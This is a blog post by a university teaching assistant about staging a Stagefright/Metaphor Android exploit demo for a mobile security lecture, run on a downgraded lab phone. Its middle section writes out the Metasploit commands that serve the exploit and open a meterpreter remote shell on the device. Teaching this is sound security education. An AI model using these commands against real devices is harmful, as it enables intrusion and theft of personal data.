Sudheendra Raghav Neela

March 17, 2023

Stagefright/Metaphor - An Android Exploit Demonstration

Table of contents

Tags:  #Android, #Hacking, #Mobile, #Rick Roll, #Security

Foreword

This post does not describe the Stagefright / Metaphor android vulnerability. To understand Stagefright, check out the Wikipedia Page [1] and the YouTube videos by Joshua J Drake [2][3] (the security researcher who discovered stagefright). To figure out how Metaphor works, I’d recommend understanding Stagefright, learning about ROP-chains, and then checking out the Metaphor whitepaper [4], available from Northbit’s repository [5].

The exploit that we demonstrated was executed on a rooted 2014 Motorola Nexus 6 running Android 5.0.1 Build LRX22C supplied by the Institute of Applied Information Processing and Communications (IAIK), TU Graz. The exploit was sourced from Metasploit [6].

Throughout this blog post, I will be referring to the exploit as Stagefright/Metaphor as it is a combination of both of these exploits that ultimately led to the shell on the vulnerable & legacy Android device.

Introduction

For the 2023 Summer semester, I’m a Teaching Assistant for a few courses, one of which is Mobile Security (taught by Florian Draschbacher). About a month prior to the beginning of the semester, we decided that we would have a demonstration of a real over-the-air exploit to show the danger of hacks on mobile devices 1. A few ideas were thrown around for the exploit that we could use which included DirtyCow [8], CheckRa1n [9], FramaRoot [10], and Stagefright [1]. In the end after a bit of searching, we decided to settle for Stagefright/Metaphor for a few reasons. Firstly, it was over-the-air, i.e., we could run the exploit without any physical access. On top of this, this could be portrayed quite dramatically - one of our primary motives. However, the most important driving force was that we could use an already existing metasploit implementation [6] that made our work much easier. This blog post’s intention is to be a small document of what we did.

The Phone

The metaphor exploit [5] was originally tested on a Nexus 5 running Android 5.0.1 build LRX22C. Our institute (the IAIK, TU Graz) had a Motorola Nexus 6 in their inventory. This was released in 2014 and was running some form of LineageOS corresponding to Android 8 (I think?) when we first received it. The phone was immediately downgraded and rooted 2 to Android 5.0.1 [7] to test the whether the metasploit exploit would even work.

The Exploit

The exploit creates a meterpreter shell session [11] to the set IP address. This YouTube Video demonstrates the exploit on a emulated Android device.

These are the commands that are run on metasploit:

// these commands are run on msfconsole
use exploit/android/browser/stagefright_mp4_tx3g_64bit

// Note that both the Android device and the computer have to be connected to
// the same network!
set LHOST 192.168.100.100 // ip address of my computer
set SRVHOST 192.168.100.100 // ip address of my computer
set URIPATH / // Android device visits http://192.168.100.100:8080/
set verbose true

exploit --job // run the exploit in the context of a job

// ...
// wait for the exploit to finish setting up
// the output should be something like :
// ...
// [*] Server started.

// Android device visits the url now (http://192.168.100.100:8080/)
// The browser automatically will download the exploit

// once metasploit outputs `meterpreter session <id_number> opened`, detach from
// the executing command (ctrl+j works)

sessions --list // list sessions
sessions --interact 1 // assuming the session that was created has id_number 1

// the meterpreter shell is now open
// you should be able to type `ls` to see the contents of the root dir on the
// Android device

Make sure the phone visits the HTTP port (8080 by default) and not the TCP listening port (4444 by default). This took me an annoying hour to realize - but to be fair, I’m pretty stupid lol.

The Demo

The shell that is gained from the exploit belongs to the user mediaserver. This user is, unfortunately 3, limited by SELinux policies that prevent it from being able to snoop around folders that it doesn’t own/access to 4. Since we would be showing the exploit to people who were in the lecture, the idea was to make it dramatic by having an attacker retrieve data from the Android device. This would only be possible if the data was owned by the mediaserver and existed in a directory that the mediaserver had access to. For this, we placed a zip file called private_data.zip in /data/adspd, a directory that mediaserver could access 5 and changed its owner to be mediaserver.

For the “performance” in the class, I pretended to be a student sitting in the lecture and Florian asked whether anyone would be up to lend their android device to hack it. Of course, no one volunteered for they would have to be crazy to willingly let the Mobile Security lecturer hack their phone. After roughly ten seconds, I raised my hand to volunteer “my android device” which surprised a few people. While I was instructed to visit a website, the class could see the metasploit shell printing out a few things on the screen but were unaware of what exactly was happening. After 10 seconds of being on the webpage, the exploit broke in and a shell to the Android device was obtained.

After this, it was all drama - going to /data/adspd showed the zip file, followed by an audible distressed plea from me to not download it. After downloading the zip file and extracting it, the contents included were the “Mobile Security 2023 Summer Final Exam Question Paper.pdf” 6 and a webpage that opened up to this (Figure 1):

Figure 1 - A webpage with a background of Rick Astley singing 'Never Gonna Give You Up'. The foreground content contains the definition of the word 'Bamboozle' as well as a chat log between Florian (the lecturer) and me. The chat log has four texts. 1 - Hey, can I be a Teaching Assistant for Mobile Security this year? 2 - Sure! Let me tell the administration to get your contract ready. 3 - Can I try hacking the students as well? 4 - ...can you please not?

Figure 1: The webpage that was opened in front of the class

After this, I briefly explained about the exploit and its history without going into details of the exploit itself (Figure 2).

Figure 2 - An image of me in front of the chalkboard talking to the class

Figure 2: I need to exercise.

The End.

Footnotes

1 Plus, it would be pretty cool to hack a phone through the air.

2 Thanks to Ananta Srikar and Aditya Goturu for helping source the build [7] and downgrading.

3 Let me clarify: this is unfortunate for us - people who want to hack devices. This is a VERY good thing for normal users.

4 One could use a different exploit to escalate to kernel privileges as is discussed in [12]. We didn’t do this as our device was rooted and we had access to directories that the mediaserver could access.

5 We used adb to place the zip file.

6 The PDF was actually the first lecture of last year. It was not the final examination which was to happen at the end of the semester.

References

[1] https://en.wikipedia.org/wiki/Stagefright_(bug)

[2] https://youtu.be/71YP65UANP0

[3] https://youtu.be/Lxo4zhKe5hA

[4] https://raw.githubusercontent.com/NorthBit/Public/master/NorthBit-Metaphor.pdf

[5] https://github.com/NorthBit/Metaphor

[6] https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/android/browser/stagefright_mp4_tx3g_64bit.rb

[7] https://www.droid-life.com/2014/12/10/nexus-6-android-5-0-1-factory-image-now-available-as-build-lrx22c/

[8] https://en.wikipedia.org/wiki/Dirty_COW

[9] https://checkra.in/

[10] https://forum.xda-developers.com/t/root-framaroot-a-one-click-apk-to-root-some-devices.2130276/

[11] https://docs.rapid7.com/metasploit/manage-meterpreter-and-shell-sessions/

[12] https://security.stackexchange.com/questions/151701/selinux-privilege-escalation-metasploit-nexus-5-android-5-0-1-lrx22c-after-stage